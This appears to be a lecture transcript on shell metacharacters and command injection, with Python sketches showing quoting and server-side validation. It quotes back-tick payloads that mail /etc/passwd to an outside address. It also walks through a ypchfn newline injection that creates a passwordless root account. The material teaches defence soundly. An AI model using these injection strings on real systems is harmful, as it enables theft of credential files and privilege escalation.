Welcome to video one, the second video of section 4.2. Here we're going to talk about metacharacters. A metacharacter is simply a character that is interpreted specially. For example, to the command interpreter on Linux and Unix systems, the dollar sign indicates a variable. As you can see, there are a number of other special characters. Note especially the backslash, which is used to remove the special meaning of (to "demetacharacterize," I guess) the next character. So if you type backslash dollar sign, the shell will always interpret that as a plain dollar sign. Now, all shells respect the ones at the top. But some shells do things a little bit differently or have extra characters. For example, in the C shell, the exclamation point typically means history. In some shells, you can use printf-style functions to have the shell do certain things; for example, the one shown prints the second argument to the shell script as a hexadecimal number. So know which shell you're using and which characters have special meaning to it. Notice, by the way, that the star at the top simply expands in the shell to match all files. What's particularly interesting about that is that in editor regular expressions, star means repeat the previous character or pattern zero or more times, which is very different from what the star means to the command interpreter. Here the arrow sign, the less-than sign, is input redirection. The semicolon is the command separator. The back ticks say: run the command between the back ticks, and replace what's between them, including the back ticks themselves, with the output. So, for example, the top line would simply send me@here.com the password file and then print here.com. To the shell, that entire back-ticked expression is replaced by here.com. You can also have it do strange editing. For example, in the second line, you're receiving input, and what this input says is, "Delete everything, beginning with line one and going to the first blank line."
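To make the two meanings of the star, and the effect of quoting, concrete, here is a small Python sketch. It uses the standard `fnmatch` module, which only approximates shell globbing (for instance, it does not skip file names beginning with a dot), the `re` module for regular expressions, and `shlex.quote`, which quotes a string for a POSIX shell so that metacharacters such as `$` and back ticks are taken literally. The back-tick payload is a reconstruction modeled on the slide's top line, not a copy of it, and nothing here is actually passed to a shell.

```python
import fnmatch
import re
import shlex

# Shell (glob) star: stands for any run of characters in a file name.
print(fnmatch.fnmatchcase("notes.txt", "*.txt"))       # True

# Regular-expression star: repeat the PREVIOUS item zero or more times.
print(re.fullmatch(r"ab*c", "ac") is not None)         # True (b appears zero times)
print(re.fullmatch(r"ab*c", "abbbc") is not None)      # True (b appears three times)
print(re.fullmatch(r"ab*c", "notes.txt") is not None)  # False

# Quoting strips metacharacters of their meaning, much as a backslash
# does for a single character. shlex.quote wraps unsafe strings in
# single quotes for a POSIX shell.
print(shlex.quote("$HOME"))                            # '$HOME' (not expanded)

# Hypothetical payload modeled on the slide: unquoted, a shell would run
# the command between the back ticks (command substitution).
payload = "`mail me@here.com < /etc/passwd; echo here.com`"
safe_command = "echo " + shlex.quote(payload)
print(safe_command)  # echo '`mail me@here.com < /etc/passwd; echo here.com`'
```

Because the whole payload sits inside single quotes, a POSIX shell would hand it to `echo` as one literal argument instead of executing it.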
The third command deals with remote execution on a host, and I'm using remexec here. Even though that's not a real command, you can replace it with SSH or a couple of others that I'll show you, which are older but are archetypal examples of programming errors. In this case, notice the backslash in front of each back tick. That means the host you're typing this on, the one running the remexec command, treats those back ticks just as characters. But the remote host, the one called host here, will get the command echo followed by "back tick, mail me@h.com, less-than sign, /etc/passwd; hi, back tick", with no backslashes. So me@h.com will get a copy of the password file, and the entire thing between the back ticks will be replaced by hi, so the remote host will simply print hi. If you've ever heard the term command injection, this is an example of it. On the next slide and the following ones, we're going to talk a little bit about how to handle things like this. What are some of the problems that might arise? The first one is: who does the checking? The client, the server, someone else? The canonical example of this is a program that thankfully no longer exists, called rexd. Rexd was a daemon that would take input from the network and execute it. The problem was that rexd assumed the client did all of the checking. The client would authenticate that the user was who they claimed to be and verify that the user had the authority to run the command on the remote system; in other words, it would check both authentication and authorization. So rexd itself said, "Oh gee, everything's already done, so I just have to run the command." The problem, of course, is: what happens if I write my own client that doesn't do the checking? Here's one that is even more direct. In many Linux and Unix systems, there used to be a set of commands called YP. It stood for Yellow Pages.
Then it got changed to NIS, for Network Information Service. The basic idea was to centralize authentication information into one database, and then programs like yppasswd and passwd would use that database to validate users. This was common when you had many workstations in one particular area or for one particular set of people. Instead of each workstation keeping its own authentication database, you put the database on a central node and the workstations queried it; there are a number of advantages here, of course. Now, the password information was stored in a file with fields separated by colons and records separated by newlines. Each user had one record, and there were seven fields in each record: the first being the username; the second the hashed password (not in the clear, but hashed); the third the UID; the fourth the GID; the fifth identifying information; the sixth the home directory; and the seventh the shell. In any case, when you logged in, your password was checked against this database, and then you were assigned the UID and GID from the record associated with you. Again, these fields were separated by colons. When you changed your information from a machine other than the central server, the change had to be sent over the network to the server, and initially the server did no checking of what was sent. So when you ran the program to change your information, which was ypchfn ("change finger information"), you would type what you wanted in the field that identified you, then a colon, then a home directory, then a colon, then a shell, and then a newline. Then you would put in a username followed by an empty password field, followed by a UID of, say, zero to give you administrator privileges, and so forth.
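The attack can be simulated with a short Python sketch of a server that trusts its client. The function `naive_change_gecos` is hypothetical, not the actual YP server code. The username `bishop`, the UID and GID, the home directory, and the shell are made-up values; the hash `zbcdef`, the name Matt Bishop, and the new user MR (written `mr` here) come from the slide's example. The `\n` in the input stands for the literal newline typed with Ctrl+V, Ctrl+J.

```python
def naive_change_gecos(record: str, new_gecos: str) -> str:
    # Hypothetical server that trusts the client: new_gecos is written
    # into field 5 (identifying information) with no checks at all.
    fields = record.split(":")
    fields[4] = new_gecos
    return ":".join(fields)


# Made-up record: name:hash:UID:GID:identifying info:home:shell
original = "bishop:zbcdef:1001:100:Matt Bishop:/home/bishop:/bin/sh"

# What the attacker types as the "new name": finish the real record,
# then start a second one with an empty password and UID 0.
injected = "Matt Bishop:/home/bishop:/bin/sh\nmr::0:0:Matt Bishop"

updated = naive_change_gecos(original, injected)
for line in updated.splitlines():
    name, password_hash, uid = line.split(":")[:3]
    print(f"{name}: password={password_hash!r}, uid={uid}")
```

The server's own suffix (`:/home/bishop:/bin/sh`) completes the injected record, so the stored data now holds two well-formed lines, and the second one is a passwordless account with UID 0.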
So now there was the beginning of a second line, one that gave you system administration privileges without a password. All you had to do was embed the newline. Since the server didn't check for colons or newlines, it would just write the data into the database without a problem. The next slide shows this in more detail. There's an example of a password file. The hash is the zbcdef part. The field that chfn changes is the part that says Matt Bishop. So we call ypchfn, and when it asks for the new name, we type the line shown down there. The important part here is the Ctrl+V, Ctrl+J. Ctrl+V says: take the next character literally, stripped of any special meaning. Ctrl+J is a newline, which would normally terminate the entry, but since it's preceded directly by Ctrl+V, it's treated as an ordinary character, just like the letter a or b. Following that, you have MR, which is a new username, and then two colons. The second field, the one between those colons, is where the password hash goes. Since there's nothing there, the account has no password. So after the server processes this, if you look at the part after the change, you will see that there are now two lines instead of that one single line, the second line picking up where the first line left off. So now I log into the system as MR. I won't be prompted for a password, because there is none, and I'll get root. Okay. So how do you handle this? Well, what they did first was change the client to disallow colons and newlines in the field. So even if you did what I showed you before, ypchfn would say, "Hey, no. I'm sorry, you have a colon there. I'm not going to accept this." But does the client run with any privileges? It turned out, no.
So what people did was write their own client that sent over whatever they wanted, and the server assumed that the client was doing the checking. Bad assumption. The second time, they did it right: they fixed the server. That's a good example of why you want to do verification and validation as close as possible to the resources you're protecting. The server controls access to the database and deals with it directly, so that's where you do the checking. Doing it at the client is nice, because it saves you sending bad input over the network. But doing it at the server is critical, because whatever the server receives goes into that database, and you want to make sure what goes into that database is right. This leads to a couple of requirements, shown on the next slide. First, know what the server expects. In ypchfn, it expects a well-formed fifth field. That means no colons, no newlines, and no other special characters that your system may misinterpret. Rexd expected an authorized command from an authenticated user. It had no assurance of either. So servers really should be prepared for anything. In both cases, the server should have assumed that the client either lied or made a mistake, and the server should have done the checking. Hence the rule you see on this slide: validate as close to the resource being protected as you can.
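A minimal Python sketch of the server-side fix follows. The names `validate_gecos` and `server_change_gecos`, and the policy they enforce (no colons, printable characters only, which excludes newlines and other control characters), are assumptions for illustration; a real server might use a stricter allow-list. The point is where the check runs: in the code that writes the database, regardless of what any client claims to have checked.

```python
def validate_gecos(value: str) -> str:
    # Hypothetical policy: no colon (the field separator) and only
    # printable characters, which rules out newline, carriage return,
    # and other control characters.
    if ":" in value or not value.isprintable():
        raise ValueError(f"rejected GECOS value: {value!r}")
    return value


def server_change_gecos(record: str, new_gecos: str) -> str:
    # Hypothetical server-side update: the check runs here, next to the
    # database, no matter which client sent the request.
    fields = record.split(":")
    if len(fields) != 7:
        raise ValueError("stored record is malformed")
    fields[4] = validate_gecos(new_gecos)  # field 5: identifying information
    return ":".join(fields)


# Made-up record in the same seven-field format.
record = "bishop:zbcdef:1001:100:Matt Bishop:/home/bishop:/bin/sh"
print(server_change_gecos(record, "Matt Bishop, Room 101"))

# The ypchfn injection, as a custom client might send it.
attack = "Matt Bishop:/home/bishop:/bin/sh\nmr::0:0:Matt Bishop"
try:
    server_change_gecos(record, attack)
except ValueError as err:
    print(err)
```

A client can still run the same check to give the user quick feedback, but only the server-side call protects the database.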